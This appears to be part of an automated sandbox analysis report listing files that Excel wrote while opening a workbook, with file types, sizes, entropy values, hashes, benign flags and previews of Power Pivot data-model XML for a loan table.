                                                                                                Preview:<XMObject xmlns="http://schemas.microsoft.com/analysisservices/imbi" xmlns:imbi200="http://schemas.microsoft.com/analysisservices/2010/imbi/200" xmlns:imbi200_200="http://schemas.microsoft.com/analysisservices/2010/imbi/200/200" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" class="XMSimpleTable" name="H$Loan$Interest" ProviderVersion="0"><Properties><Version xsi:type="xsd:int">2</Version><Settings xsi:type="xsd:long">4</Settings><RIViolationCount xsi:type="xsd:long">0</RIViolationCount></Properties><Members><Member><Name>SegmentMap</Name><XMObject class="XMSegmentEqualMapEx&lt;XMSegmentEqualMap_ComplexInstantiation>" ProviderVersion="0"><Properties><Segments xsi:type="xsd:long">2</Segments><Records xsi:type="xsd:long">124</Records><RecordsPerSegment xsi:type="xsd:long">121</RecordsPerSegment></Properties></XMObject></Member><Member><Name>TableStats</Name><XMObject class="XMTableStats" ProviderVersion="0"><Properties><SegmentSize xsi:
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (8728), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):8728
                                                                                                Entropy (8bit):5.145646850532849
                                                                                                Encrypted:false
                                                                                                Malicious:false
                                                                                                Preview:<XMObject xmlns="http://schemas.microsoft.com/analysisservices/imbi" xmlns:imbi200="http://schemas.microsoft.com/analysisservices/2010/imbi/200" xmlns:imbi200_200="http://schemas.microsoft.com/analysisservices/2010/imbi/200/200" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" class="XMSimpleTable" name="H$Loan$Payment Date (Month Index)" ProviderVersion="0"><Properties><Version xsi:type="xsd:int">2</Version><Settings xsi:type="xsd:long">4</Settings><RIViolationCount xsi:type="xsd:long">0</RIViolationCount></Properties><Members><Member><Name>SegmentMap</Name><XMObject class="XMSegmentEqualMapEx&lt;XMSegmentEqualMap_ComplexInstantiation>" ProviderVersion="0"><Properties><Segments xsi:type="xsd:long">2</Segments><Records xsi:type="xsd:long">15</Records><RecordsPerSegment xsi:type="xsd:long">12</RecordsPerSegment></Properties></XMObject></Member><Member><Name>TableStats</Name><XMObject class="XMTableStats" ProviderVersion="0"><Properties><
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (8710), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):8710
                                                                                                Entropy (8bit):5.145241883891935
                                                                                                Encrypted:false
                                                                                                Malicious:false
                                                                                                Preview:<XMObject xmlns="http://schemas.microsoft.com/analysisservices/imbi" xmlns:imbi200="http://schemas.microsoft.com/analysisservices/2010/imbi/200" xmlns:imbi200_200="http://schemas.microsoft.com/analysisservices/2010/imbi/200/200" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" class="XMSimpleTable" name="H$Loan$Payment Date (Month)" ProviderVersion="0"><Properties><Version xsi:type="xsd:int">2</Version><Settings xsi:type="xsd:long">4</Settings><RIViolationCount xsi:type="xsd:long">0</RIViolationCount></Properties><Members><Member><Name>SegmentMap</Name><XMObject class="XMSegmentEqualMapEx&lt;XMSegmentEqualMap_ComplexInstantiation>" ProviderVersion="0"><Properties><Segments xsi:type="xsd:long">2</Segments><Records xsi:type="xsd:long">15</Records><RecordsPerSegment xsi:type="xsd:long">12</RecordsPerSegment></Properties></XMObject></Member><Member><Name>TableStats</Name><XMObject class="XMTableStats" ProviderVersion="0"><Properties><Segmen
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (8712), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):8712
                                                                                                Entropy (8bit):5.146229430038961
                                                                                                Encrypted:false
                                                                                                Malicious:false
                                                                                                Preview:<XMObject xmlns="http://schemas.microsoft.com/analysisservices/imbi" xmlns:imbi200="http://schemas.microsoft.com/analysisservices/2010/imbi/200" xmlns:imbi200_200="http://schemas.microsoft.com/analysisservices/2010/imbi/200/200" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" class="XMSimpleTable" name="H$Loan$Payment Date (Quarter)" ProviderVersion="0"><Properties><Version xsi:type="xsd:int">2</Version><Settings xsi:type="xsd:long">4</Settings><RIViolationCount xsi:type="xsd:long">0</RIViolationCount></Properties><Members><Member><Name>SegmentMap</Name><XMObject class="XMSegmentEqualMapEx&lt;XMSegmentEqualMap_ComplexInstantiation>" ProviderVersion="0"><Properties><Segments xsi:type="xsd:long">2</Segments><Records xsi:type="xsd:long">7</Records><RecordsPerSegment xsi:type="xsd:long">4</RecordsPerSegment></Properties></XMObject></Member><Member><Name>TableStats</Name><XMObject class="XMTableStats" ProviderVersion="0"><Properties><Segmen
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (8707), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):8707
                                                                                                Entropy (8bit):5.147253860702353
                                                                                                Encrypted:false
                                                                                                Malicious:false
                                                                                                Preview:<XMObject xmlns="http://schemas.microsoft.com/analysisservices/imbi" xmlns:imbi200="http://schemas.microsoft.com/analysisservices/2010/imbi/200" xmlns:imbi200_200="http://schemas.microsoft.com/analysisservices/2010/imbi/200/200" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" class="XMSimpleTable" name="H$Loan$Payment Date (Year)" ProviderVersion="0"><Properties><Version xsi:type="xsd:int">2</Version><Settings xsi:type="xsd:long">4</Settings><RIViolationCount xsi:type="xsd:long">0</RIViolationCount></Properties><Members><Member><Name>SegmentMap</Name><XMObject class="XMSegmentEqualMapEx&lt;XMSegmentEqualMap_ComplexInstantiation>" ProviderVersion="0"><Properties><Segments xsi:type="xsd:long">2</Segments><Records xsi:type="xsd:long">14</Records><RecordsPerSegment xsi:type="xsd:long">11</RecordsPerSegment></Properties></XMObject></Member><Member><Name>TableStats</Name><XMObject class="XMTableStats" ProviderVersion="0"><Properties><Segment
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (5019), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):5019
                                                                                                Entropy (8bit):5.1460568027691
                                                                                                Encrypted:false
                                                                                                Malicious:false
                                                                                                Preview:<XMObject xmlns="http://schemas.microsoft.com/analysisservices/imbi" xmlns:imbi200="http://schemas.microsoft.com/analysisservices/2010/imbi/200" xmlns:imbi200_200="http://schemas.microsoft.com/analysisservices/2010/imbi/200/200" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" class="XMSimpleTable" name="H$Loan$Payment Date" ProviderVersion="0"><Properties><Version xsi:type="xsd:int">2</Version><Settings xsi:type="xsd:long">4</Settings><RIViolationCount xsi:type="xsd:long">0</RIViolationCount></Properties><Members><Member><Name>SegmentMap</Name><XMObject class="XMSegmentEqualMapEx&lt;XMSegmentEqualMap_ComplexInstantiation>" ProviderVersion="0"><Properties><Segments xsi:type="xsd:long">2</Segments><Records xsi:type="xsd:long">124</Records><RecordsPerSegment xsi:type="xsd:long">121</RecordsPerSegment></Properties></XMObject></Member><Member><Name>TableStats</Name><XMObject class="XMTableStats" ProviderVersion="0"><Properties><SegmentSize
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (10581), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):10581
                                                                                                Entropy (8bit):5.133591480280514
                                                                                                Encrypted:false
                                                                                                Malicious:false
                                                                                                Preview:<XMObject xmlns="http://schemas.microsoft.com/analysisservices/imbi" xmlns:imbi200="http://schemas.microsoft.com/analysisservices/2010/imbi/200" xmlns:imbi200_200="http://schemas.microsoft.com/analysisservices/2010/imbi/200/200" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" class="XMSimpleTable" name="H$Loan$Payment" ProviderVersion="0"><Properties><Version xsi:type="xsd:int">2</Version><Settings xsi:type="xsd:long">4</Settings><RIViolationCount xsi:type="xsd:long">0</RIViolationCount></Properties><Members><Member><Name>SegmentMap</Name><XMObject class="XMSegmentEqualMapEx&lt;XMSegmentEqualMap_ComplexInstantiation>" ProviderVersion="0"><Properties><Segments xsi:type="xsd:long">3</Segments><Records xsi:type="xsd:long">5</Records><RecordsPerSegment xsi:type="xsd:long">2</RecordsPerSegment></Properties></XMObject></Member><Member><Name>TableStats</Name><XMObject class="XMTableStats" ProviderVersion="0"><Properties><SegmentSize xsi:type=
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (8672), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):8672
                                                                                                Entropy (8bit):5.142715683899685
                                                                                                Encrypted:false
                                                                                                Malicious:false
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (8681), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):8681
                                                                                                Entropy (8bit):5.1415263305068475
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:AOMckwYWKzDUTnKjivTnKjBD/FBTWWKzDUTnKjivTnKjBDnFBhN:PK4KWKRVK4KWKJD
                                                                                                MD5:DCFD7E43A547B8B2E9B88A079D1E5C30
                                                                                                SHA1:7F83FDE40055A81016F64EDEACCF473737824EA7
                                                                                                SHA-256:DD04AC4A25AB968C5F3E234D1FE6629BE465E59EA0A5E107FC01604BAC91CCE4
                                                                                                SHA-512:1B6CEEBDE3A191358ACED20E41923D126B7E5C08EBE617791D4D9614332A7ECA6C6D2A5507ED30C67DBA1274F17F2DBEF3C324D16D1BFC83FB09448065728EA6
                                                                                                Malicious:false
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (64599), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):64599
                                                                                                Entropy (8bit):5.1651262854074025
                                                                                                Encrypted:false
                                                                                                SSDEEP:768:5AjKKOjG6jEKYjFxjKKOjQtKzKhKDyjyKOjdajyKOjp3jyKOjzFKuKyKoojdKijV:5uLNGfD692pHp
                                                                                                MD5:D6140125EBC756F403448C5652E7E73F
                                                                                                SHA1:65E4E25CBB9AE29B3566E46D633B5E0F2B9A287A
                                                                                                SHA-256:0DF87FA6D87AC3752EC1ED7D3F7C1AFFEB4EAD1E46224E14403239804560F91E
                                                                                                SHA-512:E41A2EDD70523ABD3AA94D8ECD1DF1CEFC919FDD09E6E362430ED10559B121669E992434DA7D7C359EB0EC19D861BD42A556F0AAA370D67C676AD2159E4D8F6E
                                                                                                Malicious:false
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (6150), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):6150
                                                                                                Entropy (8bit):5.043108582202338
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:tDLjZ+jZ+jZ+jZ+jZ+jZ+jZ+jZ+jZ+jZ+jZ+jZk:tDLN+N+N+N+N+N+N+N+N+N+N+Nk
                                                                                                MD5:7D1678433245EC05776715BAD2F149A4
                                                                                                SHA1:7F843EF3D86EC6397E893E245385CF654275C9BB
                                                                                                SHA-256:C81B36E3CBE12137D9F2EF62376CD4C0849005537764E7633B0C08150C29F315
                                                                                                SHA-512:1025EE2F3D279CC4CCA9D59F4B624426E1A1A9DA6D99B5B82817000CA4E2555C8BBAA2A31A58484A19DB95CFBBE475805D9643E1F4ECEC10E91137C805B18B4C
                                                                                                Malicious:false
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (6150), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):6150
                                                                                                Entropy (8bit):5.04159148551405
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:AqLjZ+jZ+jZ+jZ+jZ+jZ+jZ+jZ+jZ+jZ+jZ+jZk:AqLN+N+N+N+N+N+N+N+N+N+N+Nk
                                                                                                MD5:F76077F4091606540C605A60A4AFE39B
                                                                                                SHA1:2BBA8E3C36DFBF0E89808B74A0F37465FF955E2E
                                                                                                SHA-256:85C2A8AA6DC2F63AAD0C7A7ACCF3D31C65A3503C0B08E49D9150E58EBAD83047
                                                                                                SHA-512:CF48E83EB77051DBCA3E75A78887D873D3E119C1428E51FDBA578B0B49E2F743636FEE0359790C93469E9A907C1C52C8171FD1259D67232AC02B79BDC2FEB5C2
                                                                                                Malicious:false
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (13638), with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):38485
                                                                                                Entropy (8bit):5.219171783433957
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:FK3c2nc2Zc2Lc2Kc2Nc2gc24n2/QTQfQJQ9Q7QTQlQrQTQWc2Lc2G72n2ic2d5Z0:kQTQfQJQ9Q7QTQlQrQTQX7+5ZqB
                                                                                                MD5:07B3056A7D3DE766C3DCFBF99D64AC3E
                                                                                                SHA1:7FD783FF599140AC000A996E4E94606E26EE558B
                                                                                                SHA-256:4ADC40A4C9C29766B1B6C73F333791CFA81BDFF868D71922DC4B15C67FF09428
                                                                                                SHA-512:8D4C7D498D576835529A1800F4B2157F9642E3AFF6FC03F0B879B6CF669CF5CC18603C432D7118DF1271194904EA8119B949532C24C8F1C57F12B75E51664CAF
                                                                                                Malicious:false
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (13638), with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):36816
                                                                                                Entropy (8bit):5.216757219415159
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:lBlc2zc2jc2vc2+c2hc20c24n2/QTQfQJQ9Q7QTQlQrQTQWc2Lc2G72n2ic2d5Z0:DQTQfQJQ9Q7QTQlQrQTQX7+5ZqB
                                                                                                MD5:C18336B365254434B4D3CE5BA5F3F8C6
                                                                                                SHA1:1B06F81B600D824614FF02FB009713C3C6E2AFF3
                                                                                                SHA-256:C655A6FDDACDBFCC096B04F51CB3EDDF40E5694845FF06C1B4D7ECBA38F34E4B
                                                                                                SHA-512:3A2714A17ECB5CD39FE33E97B122A848C2E043B5FB8F93DC88F85C5F21E78BEA508DB7F5346146767861F9AD99C8D7801F1C1F316191C093F7E05FF6F4A56F84
                                                                                                Malicious:false
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (13638), with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):38489
                                                                                                Entropy (8bit):5.221188451146488
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:pL3c2nc2Zc2Lc2Kc2Nc2gc24n2/QTQfQJQ9Q7QTQlQrQTQWc2Lc2G72n2ic2d5Zy:5QTQfQJQ9Q7QTQlQrQTQX7+5ZBs
                                                                                                MD5:611CF2CCD34AA503E6195DB4F793AE37
                                                                                                SHA1:9E3FD2D19A1220186BE3947DC9E5BBC4E8DB52F3
                                                                                                SHA-256:6ED8C6E41FA763F0FBF438579864FFE0EA7FC2B6FC12B9D34A6CDC467C5A5AE0
                                                                                                SHA-512:BE63F8CBA3C035CD893DA9A84FEB85591421AF430420069AAA48D9DBA784BB538A19C454E5633DB2501B14F90372D2A2CC74797EBDC920966BEBC680235D946B
                                                                                                Malicious:false
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (5428), with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):8608
                                                                                                Entropy (8bit):5.119558189812626
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:xIBNC4/qjlLN1OGX2QOGX2TOGX2yOGX26OGX2cOGX2BOGX2kwOGG2yOGX2jOGX26:zLXOGX2QOGX2TOGX2yOGX26OGX2cOGX9
                                                                                                MD5:C14D244395BACDF66BF749DF57C0ED0B
                                                                                                SHA1:9C25CBF6EDCA9FC5BDE413A69165B474DB562382
                                                                                                SHA-256:0D37FB0737445351288523BE1A5F7D62E4B9D848F66FF42FC3DDFEAEED4B9DD7
                                                                                                SHA-512:160DF76C7400B83F29A028902F984E2F0E2495A3D570E5579E878E0B010B9153D89F4EDC27757E720B535F4D622B6FDB3608E369ADBE7E6DB9ADBBFE1D3D0F01
                                                                                                Malicious:false
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (5424), with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):8604
                                                                                                Entropy (8bit):5.117586217393708
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:xIBYC4/qjlLN1OGX2QOGX2TOGX2yOGX26OGX2cOGX2BOGX2kwOGG2yOGX2jOGX2e:mLXOGX2QOGX2TOGX2yOGX26OGX2cOGXJ
                                                                                                MD5:B23C8E5ADD256F22962AA34DFBC825B6
                                                                                                SHA1:F389FDF8D00AE3DEBF0B94F1FCF59077978AD39B
                                                                                                SHA-256:98DC193EA210A36AB7020F18C2D61D73E397CF65103128E5C8093B8141ED33EC
                                                                                                SHA-512:F042B43D872EE13CCFACA4DBB0F490822CD7F9F120EA580BB550990B0F47340AD1AE0B0A933BED3C0AEDF4F8C41D95A8A75F47F285B0867EF4CEB2A91357D274
                                                                                                Malicious:false
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (7774), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):7774
                                                                                                Entropy (8bit):5.176440781411377
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:07vexwKUYp0i4nq+0Bh0QqCRwy9u/KUdxrM+80QMTD5suNkrkrQhrfrBybzuvAk:xIV1y9iV8a2Suv5
                                                                                                MD5:9FA3F7836BAE5448676964C71387B9D0
                                                                                                SHA1:2679910A764D1F3C78CC7711000CEBB780EDBE95
                                                                                                SHA-256:8A9821A5AC0D62C52DBF4E35E0068DCF8A5846E4C01A92C6796CAA4177EFF4E7
                                                                                                SHA-512:F1F0DC77546027BBB1BCD9718BB010CFBE75DCEB2AC0E64803CE8E1DC49E9FFB1BAEB3E0C5E843611FAB2F459691C64B1E3FFDFD1FF5266A23848BCD1B75A67E
                                                                                                Malicious:false
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (7790), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):7790
                                                                                                Entropy (8bit):5.179577246960089
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:07vexwKUYp0i4nq+0Bh0ZqCRwy9u/KUdxrM+80QMTD5suNkrkrQhrfrBybz7WAT:xIU1y9iV8a2S7Wu
                                                                                                MD5:08EEB0007A0C68A8BBC97349E5EDC10A
                                                                                                SHA1:8D6DFB71A1B212856742D0CB719B27CB1C662075
                                                                                                SHA-256:6D88801E34FDED3B0C0A2413A22B0B6174573E108B2E40B17C440F74BC5F7B17
                                                                                                SHA-512:2CCC3981C9F6DA93891F00CB747D50CFA9297D5BAD2A627747394B6B3C707290ADA248A25F492FCA1C833C2D25BDA8E2981F0D6B772B016739CDEA2134FCF018
                                                                                                Malicious:false
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (7774), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):7774
                                                                                                Entropy (8bit):5.1769776259475995
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:07vexwKUYp0i4nq+0Bh0Oq/Rwy9u/KUdxrM+80QMTD5suNkrkrQhrfrBybzJVA7:xIf2y9iV8a2SJVy
                                                                                                MD5:E3A1B74852315571DE171E8615EDCA9C
                                                                                                SHA1:5C7FA75DBE1180149770A8B8A739DB32DD3B74A3
                                                                                                SHA-256:3BB337391CFB5E41155E8C7574F998B7DDEDD83920C40029763A3EAF8B603755
                                                                                                SHA-512:DB95D6D7CF070EF29DA5D6C28F81260819B203996A5099DE7AC81D61964A287ABA9CDC33EDECDA09593A7E26C618C39CCB63E8DC639820BAE69C0ABDA5D9185E
                                                                                                Malicious:false
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (3105), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):3105
                                                                                                Entropy (8bit):5.204148886618404
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:07vexwKUYbVboitqnq+0Bhu8c/aeasRAw48UpWypzhJGJdAJQAJw/nJj/nJcREB4:07vexwKUYp0i4nq+0BhefAjp+bDuuQ
                                                                                                MD5:3DAEC54805161712053124711730D94A
                                                                                                SHA1:976E2AE8E18C73F89876BB309FCD171E88DA9282
                                                                                                SHA-256:DEDD8BE8F085D34833EEE140DF3EBE22B9F56D3908D7AA246220AB8C317851E7
                                                                                                SHA-512:EC906A20DE4BF5EF9B1D59760A7C9F9AA8EAA57D5811140BA630316A0983EF1586F3CB4585500C6E87EE5B4FA22425122A80405D00BF94DDCEDFBEA8A387328B
                                                                                                Malicious:false
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (3105), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):3105
                                                                                                Entropy (8bit):5.204374780483095
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:07vexwKUYbVboitqnq+0Bhu8c/aeaSgkAwA8UpWypzhJGJdAJQAJw/nJj/nJcREP:07vexwKUYp0i4nq+0BhenArp+bDuuR
                                                                                                MD5:9821EBDAF46322F5C00F41CE2F240B43
                                                                                                SHA1:965463D4BC767111001B2B6783314E46FFC36C67
                                                                                                SHA-256:AC364946DCA4BC1BF33A8DEBCE6D943FE327679279BB2B01D0BEEDBDC2434487
                                                                                                SHA-512:2E7804B076EF6CE423D42DEE362A0201BA2EA9F12D23E2684A258EB23DF8401E68D60208D3F6C6A011B5C523E111B4CF71681CA0EEE0FF1345FA59C40ADBBF81
                                                                                                Malicious:false
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (405), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):405
                                                                                                Entropy (8bit):4.993288092656503
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:C4+DnFro8i9xTIaAGTrPQkQDQf1gwP7k9FD9FwJ:C4+Bo8SEaAGXZF7AA
                                                                                                MD5:54778A29140087496FEA63AC1756540D
                                                                                                SHA1:0306B380AB1A308B40D580695F2C6A164A1FCE5F
                                                                                                SHA-256:94B31BE59B3F92FCABC04BBC4CD874B2782550722FD43FFBC8D30F3304BFAD0D
                                                                                                SHA-512:1498F757A4D8AD357F3F140CCADC2877093531639444E5291DD7CFD930FC29D38BC391203BCEEF3B383B4503362176ABF9DF4F1E8F9860A22C744C49A114F57A
                                                                                                Malicious:false
                                                                                                Preview:<Partition xmlns="http://schemas.microsoft.com/analysisservices/2003/ext" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><DataVersion>27</DataVersion><RigidAggVersion>-1</RigidAggVersion><FlexAggVersion>-1</FlexAggVersion><DataIndexVersion>-1</DataIndexVersion><RigidIndexVersion>-1</RigidIndexVersion><FlexIndexVersion>-1</FlexIndexVersion></Partition>
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (2467), with CRLF, LF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):15807
                                                                                                Entropy (8bit):5.092832409479335
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:xIaClC0YCndOYCnpuYCnF/yanb6anbfanbqanbEanp:0/b3bobnbFp
                                                                                                MD5:6293BAB42B59FF91399A4457C4B015E7
                                                                                                SHA1:3308DC506B8D2A8B25FCB5D23C38DE10C06708FE
                                                                                                SHA-256:264546598DA669877DB19BFE7D065324AF70A5C04A7F2F8019594659B903CE0F
                                                                                                SHA-512:762872E81929C79D6E3B9DFA426B7E79DC13D8027C47F7E63A399348B73D8184593AF9B7E4A48170A977E5EE2582D0FA7AF3D1070DFD7D04078BC6A75676831A
                                                                                                Malicious:false
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):169
                                                                                                Entropy (8bit):4.934836367190815
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:5WqDmNGzE+tRnJMgTTntViJS4RKbumd0jViJS4RKbuviyiKb:57mUA+DnJH3ic4sroVic4subiKb
                                                                                                MD5:0206F0CCEAE1CF9D86B29F4222B99C0F
                                                                                                SHA1:D7C8F3C8FF1FA346CE58849D9847468E0DC3CCCB
                                                                                                SHA-256:486A513B97BD07EC88CA576FE4C4D6BB03CDD356C0E09E67902F87852236A14B
                                                                                                SHA-512:E50DEDBCDBE7D9023D868B9B17ADAE9E44E72DF85B61B1591702063D32961BF4C78F683237838BB706904C8F1ED311EDDF9BA528400A2D7B211F617ACD7C8691
                                                                                                Malicious:false
                                                                                                Preview:<Cube xmlns="http://schemas.microsoft.com/analysisservices/2003/ext" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"/>
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (1732), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):1732
                                                                                                Entropy (8bit):5.075270600647734
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:O4+sX+c+nH+oz+J+Kd+B+bi+bx+itj+nj+HH+9+++KWJo8pjNekTBDbZLV43+:07vexwKUYbVboitqnq+0Bhu8pjNe6LSO
                                                                                                MD5:02D0D040684EB8B4D88FDCA8312570DC
                                                                                                SHA1:6793028A19DD97DD161D37CA6E340733DE8F2829
                                                                                                SHA-256:0452BF4D8C88CB27647FFE6CCEE0CE8BFAF522C7D38FD79104D052165A4C02FF
                                                                                                SHA-512:752B5F86EFA22C60B5B99EE1B454F223EEBA78F080FAAB36A17B3923CBFC4136F732521747CF486DC1F6BE6464189ABF861CA3E998C9FB00E800895AE246FD79
                                                                                                Malicious:false
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:OpenPGP Public Key
                                                                                                Category:dropped
                                                                                                Size (bytes):144
                                                                                                Entropy (8bit):5.372639459024134
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:AFeZQNshkh/nHl9+lqlSRat+L0SFaqrWA+brOb1KtlAFeZQNshkn:AzsyQlqo8A0gRarOb1Kt6zsyn
                                                                                                MD5:053D880651437F6B35E80A77C66C9EA9
                                                                                                SHA1:8E6292835372B18B90037BFB4F21F8A7736A4F30
                                                                                                SHA-256:7D730DD73E3436A22AC9840D0122296824E0D31BA9F83944848DFC9A9C365554
                                                                                                SHA-512:1B83A5982D5EFD5E1040E1D88EB9C9747FD19FCF2EC5416A84430F3C3DBCE5DB02BDD28F609E1F0193AFE89C24DA82BF0CE208068D9B143D0587964D3991789B
                                                                                                Malicious:false
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (1861)
                                                                                                Category:dropped
                                                                                                Size (bytes):1939
                                                                                                Entropy (8bit):5.19481501151026
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:07vexwKUYbVboitqnq+0Bhu8vDewsRdZud5:07vexwKUYp0i4nq+0Bhf
                                                                                                MD5:BB14F6A0B68589F20411850527895FD0
                                                                                                SHA1:E8DA03319AC770A24347944D9A71568B22B2AA8B
                                                                                                SHA-256:ED5D2FB6E23C7D8D5774DA76EB17B87CF8C5A33F6188F5A5E61658395B3ACAE6
                                                                                                SHA-512:BDD77F3AE53718D89A16255DC989E8BF9E60AAD626DC70EEBA433682D9F9BDEC887B60D5DF534B001BFD03526AE10D3CF70CAFE52E3B66D979BB911F04243EBD
                                                                                                Malicious:false
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (1847)
                                                                                                Category:dropped
                                                                                                Size (bytes):1925
                                                                                                Entropy (8bit):5.167832577879531
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:07vexwKUYbVboitqnq+0Bhu8vZewqpdZ845:07vexwKUYp0i4nq+0Bho3
                                                                                                MD5:4301CB7D63DB3BCF0244A0A2683F50C3
                                                                                                SHA1:790A9F39D3929E413F0C254671D803E0D149C66B
                                                                                                SHA-256:9D39F8A45A779100EDF7C14D1FDC36BD262B7F84072F49ED90A5432077688F36
